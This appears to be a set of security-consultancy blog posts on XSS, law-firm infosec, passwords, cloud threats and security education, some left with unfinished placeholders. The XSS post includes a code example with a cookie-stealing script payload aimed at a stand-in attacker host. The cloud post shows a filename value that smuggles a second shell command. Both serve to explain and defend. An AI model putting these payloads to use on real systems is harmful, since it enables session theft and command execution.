Do you have that in XXS?

What is XSS?

Cross Site Scripting (XSS) is a vulnerability that occurs when an attacker injects script into the client-facing side of a web application. They do this by supplying data to the application from an untrusted source, typically a web request, which is then included in dynamic content sent to other users of the application without being validated or encoded. The key point about XSS is that the target is not the web site itself but its users: the site or server is used as a launchpad to deliver the malicious code to the user's browser, where it can steal login details, monitor and abuse the user's activity, or steal the user's cookies (which typically carry session identifiers).

The malicious content sent to the browser is normally JavaScript. However, it can also be HTML, Flash content or a mixture of payloads. XSS is powerful because it is commonly used to capture private data such as cookie and session information and send it to the attacker, as well as to redirect a user to a malicious site, trick them into supplying other data and possibly take control of their machine.

Types of XSS

There are three main types of Cross Site Scripting: Stored, Reflected and DOM-based.

A stored cross site scripting exploit is one where the payload is permanently stored on the web server or in its database (on a message forum, a blog, in the comment fields of a shopping website, etc.). When a visitor views the affected page, the website serves the malicious code to that user. Again, this can capture personal data and all activity in the user's browser.

With a reflected cross site scripting attack, the user's own request is echoed straight back in the response. If a user searches for a word, that word is displayed back on the page; if it is not encoded on the way out, a crafted search term runs as script instead of being shown as text. The same applies to error messages that repeat whatever the user typed. This type of attack is normally delivered to the victim as a crafted link in an email, a text message, a malicious website or a pre-filled form, and the payload is never stored on the server.

DOM-based XSS is the third variant: the vulnerable code is client-side JavaScript that reads attacker-controlled data (for example from the URL fragment) and writes it into the page with an unsafe API such as innerHTML, so the server never sees the payload at all.
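The reflected case above, as an added example that is not code from the original page: a search page that echoes the "q" parameter back into HTML, first with the raw term and then with output encoding. The page layout, the `attacker.example` host and the function names are assumptions made for the illustration.

```javascript
// Added example (not from the original page): a reflected-XSS sink and its fix.
// Assumed scenario: a search page that echoes the "q" parameter back into HTML.

// Vulnerable: the search term is concatenated straight into the page, in both
// a text context (<h1>) and an attribute context (value="...").
function renderSearchPageUnsafe(term) {
  return `<h1>Results for: ${term}</h1>
<input name="q" value="${term}">`;
}

// Fix: encode every character that has meaning in HTML before it reaches a
// text or attribute context. Single quotes and backticks are included because
// another template might quote the attribute differently.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '`': '&#x60;',
  })[ch]);
}

function renderSearchPageSafe(term) {
  const safe = escapeHtml(term);
  return `<h1>Results for: ${safe}</h1>
<input name="q" value="${safe}">`;
}

// Constructed payload of the kind delivered in a crafted link: it closes the
// attribute and ships document.cookie to a hypothetical attacker host.
const PAYLOAD = '"><script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// True when the rendered page contains a script element the browser would run.
function containsLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

console.log(renderSearchPageUnsafe(PAYLOAD)); // the payload survives as markup
console.log(renderSearchPageSafe(PAYLOAD));   // the payload is shown as text
```

Encoding has to match the context the data lands in: the HTML encoder above is right for element text and quoted attributes, but data written into a JavaScript string, a URL or a CSS value needs that context's encoder instead. For the DOM-based variant the equivalent fix is to write untrusted data with `textContent` or `setAttribute` rather than `innerHTML`.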

Risks Associated With XSS

  • Misuse of server bandwidth and resources
  • User account (username and password) theft via cookie hijacking
  • Keystroke logging of user activity
  • Abuse of credentials
  • Exploitation of the user's browser
  • Web application defacement and vandalism
  • Theft of content

Top InfoSec Tips For Law Firms…

There's a quiet revolution taking place in the legal industry and it is gathering serious momentum. The legal sector suddenly has to operate as a fully-fledged commercial entity; the technology, processes and regulatory requirements are growing, and lawyers do not necessarily have the time or in-house skills to harness the benefits and opportunities the new era presents.

With that in mind, here are some of the key areas a forward-thinking firm should embrace as it scales to capitalise on the opportunities the 21st century presents.

Infrastructure Security
Gone are the days when IT managers and 'techies' kept their cards close to their chest and treated the company's IT infrastructure as if it were their own, always powerful and always in control.

With the evolution of cloud services, virtual desktops, smart devices and the changing needs of users, IT managers are slowly watching their control and native powers diluted. All is not lost, because the company will always need an internal expert on hand, but on the whole these roles are being transferred to account managers within hosting companies, and whoever was the IT manager is now a middle man, a transition manager, a consultant, or moving on to other things outside the legal sector.

Within the infrastructure, security at most 'smart companies' is relatively good. For as long as these IT managers held their posts, things were secure to a point; at that point hacking, insider threat and data loss were not major challenges, and the biggest challenge was probably the disconnect between IT and the rest of the business over what could and could not be bought (hardware, software, gadgets) to propel the business.

Cloud Computing
Cloud security and cloud computing have become the buzzwords of the industry, but not many people really understand the concept and its implications for their business. While it is touted as very economical, often not enough planning and thought goes into the transition, so the real opportunities are missed and new risks are added on top of those that were never identified under the traditional computing model.

Four key areas for law firms to consider when transitioning from the traditional technology services model are:

  1. Know your current risk profile and measure it against the perceived unknowns of the proposed solution and whether it is fit for purpose
  2. Know who holds your data and systems, what they hold, where (within the EU or outside it) and how
  3. Know the laws and compliance requirements of the country concerned
  4. Perform regular or on-going audits of your systems

Application Security – Case Management System
Application security is an increasing concern for organisations because of the capabilities and the 'unknown' freemium culture, especially for applications that are uncontrolled and not necessarily proprietary. Often the security within applications is substandard and does not meet a minimum security standard, and where security exists it is a bolt-on rather than something built into the SDLC.

Compliance – LEXCEL – ISO22301 – ISO27001 etc.
Never before have compliance, best practice and international standards played such a huge role in how organisations manage their data and IT. Over the past 6-10 years the reliance on, and demonstrable accountability for, compliance with standards and laws (the Bribery Act, DPA, HIPAA, SOX, PCI-DSS, ISO 27001 etc.) has become big business as well as a challenge: practically, financially and strategically.

With globalisation and the ease with which a small company can compete with a huge multinational, the boundaries for compliance and transparency widen, and various accreditations and compliance requirements come into play where privacy and security are concerned.

Many law firms operate globally, and as they cross borders the compliance burden grows if they plan on expanding and dealing with their ideal multinational clients. Some of the compliance requirements applicable in some of the top developed countries are as follows:

  • UK – DPA, Bribery Act, FOI, ISO 27001, acquisition law, competition law etc.
  • Switzerland – ASIA – US

For any successful expansion into the above areas, your firm will need to tick the boxes that demonstrate compliance and show that it deserves a place at the international table.

Bring Your Own Device – The Smart-device Explosion
Statistics – ……..

'BYOD, oh BYOD': the headaches and challenges this phenomenon brought into organisations under the guise of productivity and flexibility, without being fit for purpose. When smart devices hit the workplace, CEOs and high-flying executives were the main early adopters, but they never really understood the implications for security and compliance, or whether the devices could be integrated into the existing IT infrastructure. This posed the added challenge of entertaining 'bolt-on' workarounds so that CEOs and those with influence could keep enjoying the status quo.

Secure File Sharing – Document Management Security
Time and time again you see lawyers with huge suitcases and lever arch folders making their way to court, struggling with highly confidential files and client details. Imagine for a moment that they were mugged by the defendant's accomplice, or left the case on the train. The market for online sharing and collaboration is growing at a rate the industry has never seen, and with it the need for more security and protection of the sensitive files that 'float' across the wires every second, now larger than ever thanks to superfast broadband.

Everything is going online, and only the firm that is forward-thinking and serious about growth, profitability and client care will succeed; secure online collaboration will no doubt strengthen the position and strategy of such firms. In some courts, solicitors simply turn up and all their casework is already at the courthouse before they arrive. These new approaches to file transfer are becoming more prevalent, and the value they add to the firm and the client is enormous, but a strategic decision is needed not only on the secure file transfer approach but also on the secure storage and indexing of scanned documents. These must be kept secure (encrypted) with fit-for-purpose security and compliance controls to mitigate the risk of data leakage.

Big data has become a buzzword over the past two years or so, but who generates more data than a law firm, and highly confidential data at that?

Points to consider for law firms include:

  • Secure data sharing facilities
  • Data archiving and document management security solution
  • Data retention policy and access control
  • Last but definitely not least, the security of the enormous amount of data generated and stored by law firms.

Sadly, some law firms are still on the fence about moving to a robust data and IT platform, which nowadays is a key strategic factor supporting growth, strategy and ROI.

Removable Media Security
(pen drives/memory sticks, iPods, CDs)

Proactively Challenge Your Security

Vulnerability scanning / Pen Testing

On-going training and awareness of employees

eLearning, workshops etc.

 

Don’t Drop The Ball, eh, Data..!

Infosec is about protecting your most valuable asset: your data. It means evading and staying ahead of your opponents, attackers and competitors all the way. Yours truly (our CEO) is doing just that, securing the ball and sprinting out of harm's way.

Our CEO Clinton Walker plays American football, and he knows all too well the risks that lie ahead, or are waiting for him, on his way to scoring.

Implementing, practising and managing information security and its associated threats is a game made up of multiple vectors and actors, just like a team in whatever capacity you view it. It is a collaborative approach that requires negotiation skills, professionalism and calculated risk-taking.

Like any team, everyone is playing to win. In this case, winning is about protecting clients' data and evading the obstacles and curve balls hackers throw at you.

So just how do you keep that golden ball/data safe?

  1. Know your asset (data)
  2. Assess the likelihood of the risks associated with it
  3. Implement controls that address the risks and potential threats to your asset
  4. Continually review and update the risk profile of this asset
  5. Keep it secure at all times, whether on premise or in the cloud
  6. Know your opponent
  7. Do not get fouled or caught out with unnecessary penalties
  8. Build your credibility through good practice, partnership, good governance and sportsmanship
  9. Educate and continually train your team to identify, report and mitigate gaps in the field and in any process
  10. Be open to new approaches and thinking in managing risk, and ensure that your data is managed securely at all times

The Inside Threat

Insider threat: the root of all evil when temptation and unfavourable circumstances become overbearing.

Time and time again 'the business' panics amid a plethora of noise about a new or reincarnated strain of malware or botnet. Yet whilst we are caught up in the noise, the acronyms and the race to get a new fix in, our esteemed internal colleagues may be plotting a sly way to steal your treasure: your data.

Insider threat has always been on the radar, but organisational political correctness tends to be a bit soft and fluffy about trusting employees. It is great to have an established view that 'I trust all my employees'. But we live in the real world, where data is a strong currency and not everyone who works for you shares your vision and company ethos.

The phrase 'keep your friends close and your enemies closer' could easily be twisted into 'keep your enemy close and your employees closely monitored'.

Time and time again you see data breaches in the news, deliberate or accidental, and wonder why it keeps happening.

Over the last 12-18 months there has been a spate of incidents at household names such as Morrisons, government departments and other private entities. For Morrisons, lightning struck twice in the same place. It is a telling story considering where cyber security was in terms of board-level visibility 5-10 years ago. Boards can no longer ignore the fact that they are live targets; it is not a matter of 'if' but of when they find out they have been hacked. There was a time when most data breaches arose in the public sector while private companies quietly grinned as if to show off their level of investment and robustness. What we see now is humility and a quiet shuffling of the cards as firms make strides towards hardening and ensuring that information security is talked about and embedded throughout the organisation.

Whilst most tech-savvy people and infosec enthusiasts know, or at least acknowledge, that cyber defence is currently mostly firefighting, it is equally true that some SMEs simply do not have the resources, finance or appetite even to start defending their business.

There are, however, things companies can do on their own, with ad-hoc or ongoing third-party support. Here are some ways to start building a foundation:

  • Develop a policy and share it with everyone in the business; discuss the challenges and gather feedback to improve it as the business evolves
  • Help employees understand the reasons behind these policies and the importance of adhering to them
  • Use software tools as part of the strategy to complement the policies, and monitor and update data security controls as necessary.

So what’s the solution?

Whatever the solution, we will always be human and we will always find a way. The answer cuts across people, process and technology.

People

Provide current, realistic training and awareness for all employees, tailored to team and individual roles. The value of good training cannot be over-emphasised: a great proportion of breaches are down to human error and are accidental.

Process

This is a broad area open to various interpretations. In this context, process means:

(1) A process governing access to data classified as privileged

(2) A process to proactively monitor staff activity to spot trends and spikes in behaviour: not random one-offs, but long-term persistent activity.

(3) Staff profiling, including external connections and outside affiliations that could cause concern by association or create potential for blackmail, bribery etc.

Six Advantages Of Hiring An Infosec Biz to Safeguard Your Business

A few days ago I received an online Facebook chat message from a former colleague asking for a donation for the surgery of a close friend. I eagerly volunteered to help and took a few details including where the money was to be transferred. However, on calling her I was informed that it was not her that sent the message, but an 'imposter' who had replicated her Facebook page and was contacting all the people on her list seeking a donation. Now imagine if I were a customer of yours and had received a similar message from your business Facebook page?

As businesses become more accessible to their customers, they unfortunately also become increasingly accessible to cyber criminals.

Smaller businesses are the most vulnerable to cyber attacks

A 2013 report on information security by the UK government confirms that cyber attacks on small businesses are up by 10%, with 87% of small businesses reporting some form of security breach in the last year. The report also highlighted that the majority of these breaches were a result of staff action, and that small businesses were often found lacking in user awareness, mobile working policies, removable media controls, monitoring, network security and the ability to respond to an incident. No wonder, then, that smaller businesses offer attackers the path of least resistance to valuable customer data, including credit card details, intellectual property and even money in the bank. According to an internet threat report published by Symantec in April this year, the highest growth in targeted attacks was seen in businesses with fewer than 250 employees.

Look beyond an anti-virus program to secure your business

Given these facts, it is safe to assume that your business is exposed and needs defending against serious cyber threats. Email security is one aspect, but unauthorised access to your business information via laptops, desktops, wi-fi printers and routers, mobile devices and other channels such as social media and cloud-based services also needs to be monitored. Rather than relying on a member of staff or part-time technology personnel, consider hiring a professional IT support company capable of deploying device controls, up-to-date firewalls and a comprehensive web security gateway.

An IT support programme can offer your business the following benefits:

  • Examine the business hardware for signs of network intrusion
  • Educate staff on desktop policies
  • Check for outdated security definitions and missing patches on systems
  • Monitor incoming and outgoing traffic to detect potential threats
  • Secure your website
  • Streamline your network structure for ease of administration and scalability

Looking ahead, social media, cloud service providers and mobiles are predicted to become the new cyber security battleground. This means multi-layered security software, an online usage policy, security software on mobile devices and a full risk assessment before signing up to a cloud service. Make sure you seek adequate information on these aspects from your prospective IT support company.

 

How safe is your customer data across various cloud platforms?

Though the 'cloud' has been around for a while and has gained tremendous momentum, some companies are still hesitant about the risks whilst others are revelling in the opportunities it presents.

For companies still at the crossroads, it is only a matter of time before the cloud, private or public, is the only option.

But what risks does this opportunity bring with it?
Whatever option a company uses, there will always be risks; the question is the size of that company's risk appetite.

 

What are some of the controls you can harness to support the protection of data?

 

Build Platforms With Security in Mind

We use third parties who specialize in securing data because they know way more about it than we ever could. We do what we do well, and we let them focus on what they do well. We also try to design our platforms with data security in mind from the beginning. If the architecture is full of holes from the start, no amount of security is going to help.

 

Use SSL Certification, Malware Scans, VeriSign

Our website is scanned on a regular basis for malware and other security risks, and we also possess an SSL digital certificate so our customers know our webpages are safe. Our website is also SSL encrypted. Lastly, our website displays the VeriSign seal, which is another way our customers know they can use our website without risk.

 

Choose Partners Carefully

As a scrappy startup, it’s very easy to find low-cost providers of analytics or customer relationship management (CRM) software. We choose to work closely with name-brand partners. We research the security of those firms and trust them implicitly, given that a lot of the “big guys” — large companies with a lot more to lose — choose them. Invest in security from day one to ensure customer trust.

 

Plan, Then Create a Backup Plan

Take the most obvious steps in order to ensure the safety of your customers' data — this includes ensuring all firmware/software is up-to-date, utilizing SSL certificates to encrypt important data transmission and focusing on code security to eliminate potential database and XSS vulnerabilities. Then, create a backup plan in case that fails. Store critical customer data in encrypted formats!

Eliminate Possible Security Problems With Beyond Security

Our e-commerce site accepts large credit card payments daily for big-ticket items, so we understand the importance of protecting our customers’ data. For this imperative task, we use Beyond Security (beyondsecurity.com), a service that performs daily testing on our website to eliminate the possibility of website security problems, like malware, SQL injection and cross-site scripting.

 

Password Best Practice

Passwords are like the keys to your home or car; at work, a password is the digital key to highly sensitive data. So why use a weak or simple password to protect it?

…as the keys are to your car, home and office, so the password is to your sensitive data…

Choosing a secure password is critical to maintaining security. Your primary objective is to make it difficult for anyone trying to guess or crack your password electronically. Passwords should contain at least 8 characters, and should include at least one digit and one special character (e.g. punctuation marks). Longer is better: extra length does more for resistance to guessing than any single character class.

Top Tips for creating Strong Passwords:

  • Use upper and lowercase characters (A-Z & a-z)
  • Use digits from 0-9
  • Use special characters such as %£$*?'@

Password Dos and Don’ts

Dos

  • Use/create a strong password – Use special characters
  • Change your password regularly (every 40 days, for example) and immediately if you suspect it has been exposed; note that current guidance such as NIST SP 800-63B favours change-on-compromise over fixed schedules, because forced rotation tends to produce predictable variations of the old password
  • Create a password with a minimum of 8 characters
  • Use different passwords for different systems, applications where a single sign-on solution is not in place
  • Use a password safe if there’s one available
  • Be careful of shoulder surfers watching your keystrokes to remember your passwords
  • Do make it random – for example, combine different themes/genre into one password – a word from a song, a poem, holiday, a movie etc.


Don'ts

Basic practices to keep your password, and your access to data, secure:

  • Do not share your password with anyone, not even your manager
  • Do not use passwords or combinations of characters that are easy to guess
  • Do not use your favourite pet's name, animal, colour, child's name or date of birth
  • Do not write it down or stick it to your computer screen
  • Do not use 'password', 123456, abcdef etc. as your password
  • Do not use your username or login as your password
  • Do not use a word or phrase spelt backwards
  • Do not reuse a password by changing or adding a number or letter at the end
  • Do not reuse any of your last series of passwords
  • Do not use dates to create your password, e.g. September2011
  • Do not use the same password for personal and work use
  • Do not simply substitute numbers for letters, e.g. password changed to p055w0rd; cracking tools try these substitutions automatically
  • Do not use any of the examples given in this document as your password
  • Do not use standard dictionary words
  • Do not tick the box or agree to have your password saved by any online form you fill in


Examples of a weak password

  • A blank password field, something that is easy to guess, the name of your pet, birthdays, favourite colours etc.
  • 12345abcdef
  • Abcdef
  • Password
  • letmein

Examples of a strong password

  • A password of at least 8 characters containing one or more of the following: ?%1$*)#@]£
  • A password containing upper and lower case letters and spaces

 

EXAMPLES OF PASSWORD BREACH IN THE PRESS

Facebook: http://money.cnn.com/2013/12/04/technology/security/passwords-stolen/index.html

http://grahamcluley.com/2013/11/top-50-passwords-adobe-security-breach/

eBay Password breach: http://www.bbc.co.uk/news/technology-27503290

http://www.forbes.com/sites/gregorymcneal/2014/05/26/how-to-protect-yourself-after-the-ebay-data-breach/

Very Good examples: http://www.pcworld.com/article/2089244/the-25-worst-passwords-of-2013-password-gets-dethroned.html

Here's the full list of the worst passwords from 2013, according to SplashData:

  1. 123456
  2. password
  3. 12345678
  4. qwerty
  5. abc123
  6. 123456789
  7. 111111
  8. 1234567
  9. iloveyou
  10. adobe123
  11. 123123
  12. admin
  13. 12345
  14. password1
  15. princess
  16. azerty
  17. trustno1
  18. 000000
  19. 1234567890
  20. letmein
  21. photoshop
  22. 1234
  23. monkey
  24. shadow
  25. sunshine

Any of those familiar?

Security Resilience in The Cloud

Background

As technology advances and demand for new multifunction devices and cloud services soars, the complexity and feature count grow into an enormous compliance and security challenge. Equally, the security issues that accompany these devices are a major reason why information security has gained momentum over the years, and why demand for assurance keeps growing. It is only natural to face up to and tackle the imminent issues that pose a threat to the global corporate world.

The growth in attackers, malicious code and the inevitable zero-day exploitation is only getting worse. Enterprises challenge and mitigate these risks by using every available countermeasure and measuring their success or failure in a dynamic, global IT environment.

What are the threats in a hosted cloud environment?

The threat landscape is constantly changing. However, some of the most dangerous threats are 'old school' ones with a more sophisticated approach to launching an attack. Some of the typical threats pertinent to cloud services are:

Command Execution

A command string executed in server-side code contains unvalidated user input.

Potential impact

  • The attacker can execute arbitrary commands with the web server's privileges
  • Those commands can retrieve data from the server or alter the server directly

Simple example

  • A web user is supposed to provide a filename to be displayed or retrieved
  • The web server passes that filename straight into a shell command such as "echo" or "copy"
  • An attacker provides the filename "stupid.txt & myMaliciousCommand", and the shell runs the second part as a separate command

Session Hijacking

This is sometimes also known as cookie hijacking: the exploitation of a valid session, identified by a session key or token, to gain unauthorised access to information or services. The attack happens when a malicious user guesses or steals the authentication token for that session and, by presenting it, accesses the web server or its resources as the legitimate user. This can lead to further breaches via man-in-the-middle attacks, browser attacks or the installation of malicious code on the system.

Compliance and legislation

Legislation and compliance in the cloud are slow to adapt. Few businesses manage to satisfy compliance requirements in an interconnected cloud environment. Requirements such as SOX, HIPAA and the Safe Harbour agreement are some of the main cross-border challenges businesses must contend with to provide assurance and security. One of the biggest problems with the increased use of cloud services is that the client cannot, with confidence, control where their data is stored or who is processing or harvesting it, and that in itself is a security challenge.

Especially where the cloud provider's service is free, the client has no say over where their data is stored, backed up and managed.

Compromise of Interconnected Systems

Resulting from exploitation of a trusted path through an insecure application or network resource, leading to the compromise of partner systems and their data and in turn to a loss of reputation and customer confidence. Clinton at Security Aware calls these 'cross-contamination exploits': an exploit that compromises every system hosted in a shared environment.

Denial of Service

Resulting in the unavailability of network and application resources, potentially leading to the loss of revenue.

What are some of the vulnerabilities?

These key threats are most often realised through the following vulnerabilities within the internal network:

  • Unused open ports and services
  • Missing security patches/updates
  • Poor design, configuration and implementation of services
  • Default/generic user accounts (username & passwords)
  • Lack of understanding of best practices and security requirements
  • Lack of or poor internal monitoring and auditing of systems
  • Excessive privileges assigned to users within an unrestricted environment

When should you perform security assessment of your cloud system?

With new vulnerabilities and malware exploits appearing daily, it is best practice to develop a robust vulnerability management strategy to manage the threats your business continuously faces. Assessment should be done regularly to keep constant visibility of those threats. Some companies identify and manage vulnerabilities weekly, fortnightly or monthly; bigger companies with dedicated budget and resources often perform security assessments daily.

In addition, it is critical to assess corporate networks and their services both prior to initial roll-out and on a regular basis, to ensure that all specific security threats are understood, managed and remediated.

Ten top cyber security tips for small business

SMEs and start-ups are some of the most profitable and fastest-growing companies, with a flair for innovation, passion and a surplus of energy. However, by their very nature these individuals ('hunters') do not see the need to slow down and assess the things that would fine-tune and streamline the structure of their business, unless they are lucky enough to have the backing of a venture capital (VC) firm.

The security and compliance are the last things on their mind…their aim is to succeed and push the barriers of opportunity and as such sometimes need ‘bolt-on’ support to piece all the scattered piece of puzzles together. Especially if they reach a point where they decides to sell or move into new markets; markets that requires them to demonstrate and operate in a defined manner.

So, for all the buzzing enthusiastic entrepreneur out there, try and get it right as go you along and don’t just ignore the little things that could potentially boost your position in winning the next deal.

Here are some tips to bear in mind prior to starting your journey as an entrepreneur and during your journey to achieve your entrepreneurial aspirations:


  • Understand the market you are targeting and ensure that you address all the standard requirements your prospective clients would expect, even before they engage you
  • Make sure you understand your obligations around preserving the confidentiality, integrity and holistic security of their data
  • Develop a security policy
  • Develop and implement an acceptable usage policy internally if you have other employees
  • Always ensure you use, at a minimum, a non-disclosure agreement and a client engagement letter to solidify your business relationships with clients
  • Carry out regular security scanning/assessment of your website, systems and applications if you are an ecommerce business or predominantly operate online
  • If you are an ecommerce business, be sure to think about doing the minimum, a PCI DSS self-assessment questionnaire. You need to show that you take client data security and the security of your business seriously
  • Ensure you register with your data protection and privacy agency (in the UK, register with the ICO)
  • Develop and implement a mobile device usage strategy and policy
  • If you have a lot of uncontrolled devices, or your employees use their own devices, there is all the more reason to focus on the security and compliance of those devices regardless of who owns them. At the end of the day, whatever data is pushed to these devices, you as a company are responsible for how it is used and processed
  • Develop and implement a social media policy to help your business make the most of these mediums and gain the full benefit to be had from social media
  • Start seriously thinking about, or purchasing, a cybersecurity insurance policy to help cover you in the event of a cybersecurity hack or breach
  • Take every opportunity to educate yourself and your employees, on a regular basis, about the changes in legislation that may impact the way you operate your business (EU Directives, the Safe Harbour agreement, the Data Protection Act, FOI, the Bribery Act) as well as how to deal with potential security scams and suspected breaches
  • Some people may say this is not relevant because their company is too small to be doing some of these things, but a key thing to have in place is a business continuity plan. What if you were to fall ill, or your business was flooded, caught fire or was hit by civil unrest? Would you still be capable of providing the same level of service to your clients?
  • Have a clear, easy-to-understand incident response plan
  • Encrypt every piece of data you deem important to the running of your business
  • Perform a risk assessment on your business (at least on the critical areas)

Infosec In Schools – Is This Too Much To Ask For…?

According to the Information Commissioner’s Office (ICO), data breaches in the UK have increased tenfold in the past five years. In local government the increase was 1,609% and within the NHS 935%.

With the current potential fine of up to £500,000 for data breaches and for data that is not adequately protected, schools are not immune to such fines. At the rate at which cybercriminals are compromising systems, whatever the industry or organisation, and given the lack of robust security in some schools, it will not be long before the ICO is issuing fines to schools for data breaches.

In the education sector, firm figures are not yet available. However, schools and FE and HE institutions are arguably some of the institutions that have been somewhat left behind in picking up the mantle of information security. Unless they are a ‘flashy’ academy, a high-profile university with lots of money, or one of those schools that falls into the Building Schools for the Future category, essential security programmes and best practices are hardly on the radar of their internal infrastructure. The situation gets worse further downstream, where not many schools actively deliver up-to-date, relevant cybersecurity or cyberbullying workshops and/or educational awareness seminars to fulfil their e-safety responsibilities.

The pace of technology is moving so fast that the programmes currently delivered in schools are dated and, for the most part, require a total overhaul. For this to happen, a shift in every aspect of the schools’ culture and the education system needs to take place: from strategy and curriculum, to teachers and infrastructure, to pupils, staff, parents, guardians and carers.

The Facts

More and more there is a significant focus on education institutions, simply because they are seen as easy targets for cybercriminals. Over the past few years there has been a spike in the frequency and number of security breaches in the education sector, which can be argued to be utter carelessness. One such example is the ‘big bang’ of the Conficker virus that slammed a lot of educational institutions, compromised a lot of confidential systems, data and emails, and took control of critical infrastructure assets. The impact was so harsh that Internet Service Providers and various other organisations blacklisted some institutions and various domains.

Some of the most recent reports of data security breaches in Schools are as follows:

As with many businesses, the security culture that is expected by default is a painstaking taste to acquire, and the majority of businesses nowadays are playing catch-up with everything in the technology arena unless they are at the cutting edge of forward-thinking innovation and setting the pace.

The Current Situation In the Education Sector

The current situation, and the way in which the powers that be fund, support and drive curriculum programmes, leave much to be desired. The lack, or shortage, of ICT teachers and experienced ICT members of staff in some schools leaves those schools more vulnerable to cyber-attacks, and even where schools subscribe to their local authorities for infrastructure services, there are still massive deficiencies in various areas, to say the least, in terms of holistic security and compliance and keeping up with the pace of mainstream technology.

Why Pupils’ & Institutions’ Data Needs Protecting

  • Protected and vulnerable children need their privacy protected
  • The school has a responsibility for safeguarding children whilst they are in its care on campus
  • Test results, exams and pupil records can have serious implications if this sensitive information were to fall into the wrong hands, such as paedophiles, cybercriminals and people with malicious intent

There’s Still Hope…

The Ofsted e-safety framework is a great start to standardise and set the foundation for best practices and governance in schools in a holistic manner.

The framework covers key areas such as:

  • All teaching and non-teaching staff should be aware of, and able to recognise, e-safety issues, with high-quality leadership and management making e-safety a priority
  • High priority given to training, and continuation training, for all staff, including the contribution of the wider school community, with one member of staff receiving accredited training (for example, to become an e-safety officer)
  • Clear reporting processes
  • Rigorous, plain English policies and procedures integrated with other relevant policies
  • Progressive e-safety curriculum
  • Provision of a recognised Internet Service Provider (ISP) with age-related filtering
  • Good risk assessment

The Challenges

Some of the key challenges that hinder the growth of this area as a profession, and the seriousness with which it is treated, are:

  • Its attractiveness to the younger audience who will make up the future workforce
  • The industry does not have a standardised career path similar to well-established professions such as finance, medicine, nursing etc.
  • There is not enough awareness in schools, or even among the general public, of the opportunities and rewards of an information security/cybersecurity career
  • The lack of teachers and careers advisers with the right skills, knowledge and depth of experience; most of these advisers are somewhat behind in terms of technology experience and are predominantly focused on traditional mainstream career paths


If the education sector is to thrive and become more vigilant, and as high-tech as some of the wealthy academies, there needs to be a radical shift in culture and in the way the traditional curriculum is structured and run.

What Needs To Be Addressed At School Level?

Some of the things that need to be addressed to enable schools, the labour force and the country as a whole to sustain and defend against the growing cyber threat that could compromise key national infrastructure systems are:

  • Greater support from government, education bodies and independent agencies to ensure that the right resources are allocated to the areas that need them most, and to those areas that will promote a cultural change and a fresh approach to the future of cybersecurity and how to mitigate its risks
  • Recruit and/or train the educators of the future and encourage existing industry professionals to work in the education sector
  • Train a new generation of careers advisers and make sure that information security is seen as an attractive profession, with remuneration similar to or better than comparable professions and other career paths
  • Regular campaigns and awareness workshops need to be part of the ethos and strategy to build a stronger platform and framework for the new generation of security professionals
  • More cyberbullying workshops, competitions and activities around security, privacy and best practices need to be undertaken to continuously reinforce the message and the long-term objective of establishing information security as a profession to aspire to
  • Careers open days need to be held across the country to raise nationwide awareness of the importance of information security and cybersecurity to the country and to schools


At the moment, there are no prescribed pathways for a younger person, or an adult looking to switch career paths, to follow. Some, if not most, of the seasoned security professionals in large organisations nowadays are people who just fell into information security because they were the most technical person in the organisation at the time, or because they independently saw a need and a gap at the time, and their career evolved from there.

Unlike many other career pathways that have a definitive route into a sector, the IT sector as a whole is one of the most disjointed, and there are many unorthodox routes into the various roles in information technology.

As an example, a typical route into the field of information security, ending as a Chief Information Security Officer (CISO), could look like the following:

  1. Aspiration or career change
  2. Gain applicable experience (through a series of roles including, but not limited to: Security Analyst, Security Auditor, Malware Analyst, Systems Security Administrator, Network Specialist, IT Manager/team lead…)
  3. Gain a degree (or non-degree qualification), or private training that is not curriculum related
  4. Gain one or more of the following qualifications: CISM, CISSP, CISA


Some of the most common job titles/roles in the field of information security are:

  • Chief Information Security Officer (CISO)
  • Security Analyst
  • Security Consultant
  • Privacy Analyst/Consultant
  • Security Architect
  • Technical Security Architect
  • Security and Compliance Officer
  • Security Manager
  • Vulnerability Manager
  • Ethical Hacker


Some of the qualifications one needs to possess to work in the field are as follows:

  • CISSP – Certified Information Systems Security Professional
  • MSc – Master of Science in Information Security
  • BSc/BS – Bachelor of Science in Information Security
  • ISO27001 Lead Auditor
  • CISA – Certified Information Systems Auditor
  • CISM – Certified Information Security Manager
  • CSO – Chief Security Officer
  • Many years of hands-on experience directly in the field*

The government recently launched a cybersecurity apprenticeship scheme [ http://www.bbc.co.uk/news/uk-19987761 ] aimed at attracting apprentices in the area of security, to create a pool of future professionals to help protect the interests of the country and support the country’s cybersecurity strategy. Suffice to say, enough hasn’t been done to ‘chip’ the iceberg, and it will take a combination of efforts, partners and equal aspirations among the eligible workforce to really move things forward in this area.

As a country with such a strong reputation for its education system, we are uniquely positioned to lead by example and embed a strong security culture in schools and education institutions to help combat the ever-growing threat of cybercrime against our nation. The sooner efforts are made to establish cybersecurity as a mandatory course in schools, the better placed we will be to nurture an educated, committed and skilled workforce to fill the gaps in this area. Never before has there been such a push for more skilled security professionals to fill the skills gap and protect the national infrastructure and intellectual property of the state, businesses and individuals.

Practical Steps And Suggestions

So, how can the government and the business community help make this happen?

  1. Empower senior educators and institutions with the free will and support they need to make the right decisions, and hold them accountable for the outcome of such initiatives
  2. Embed the need for excellence and result-driven measurement in the performance objectives and KPIs of education institutions
  3. Embed a security culture at the core of the education system, i.e. from kindergarten, primary schools and secondary schools through to FE and HE institutions
  4. Develop extra-curricular programmes and activities inside and outside the educational environment to keep the momentum and enthusiasm flowing
  5. Make the profession attractive to all genders and to those in other age-old professions
  6. Incentivise the profession and make sure it is seen as viable and as worthwhile pursuing as any other career
  7. Develop a framework or code of conduct, and an association, that harmonises all the disjointed packets of the profession; by doing so, misconduct, malpractice and carelessness are dealt with in similar ways to those working in the legal, financial and medical arenas
  8. Develop and implement legislation and a supplementary framework to support and add credibility to the profession, to ensure it is taken seriously
  9. Embrace change and adapt to the changing cyber-world around us

This list of recommendations could go on and on, but nothing happens without the commitment of all stakeholders involved and senior management buy-in and support. What is needed is a collaborative approach, one that also requires direct input in the form of a top-down approach where necessary.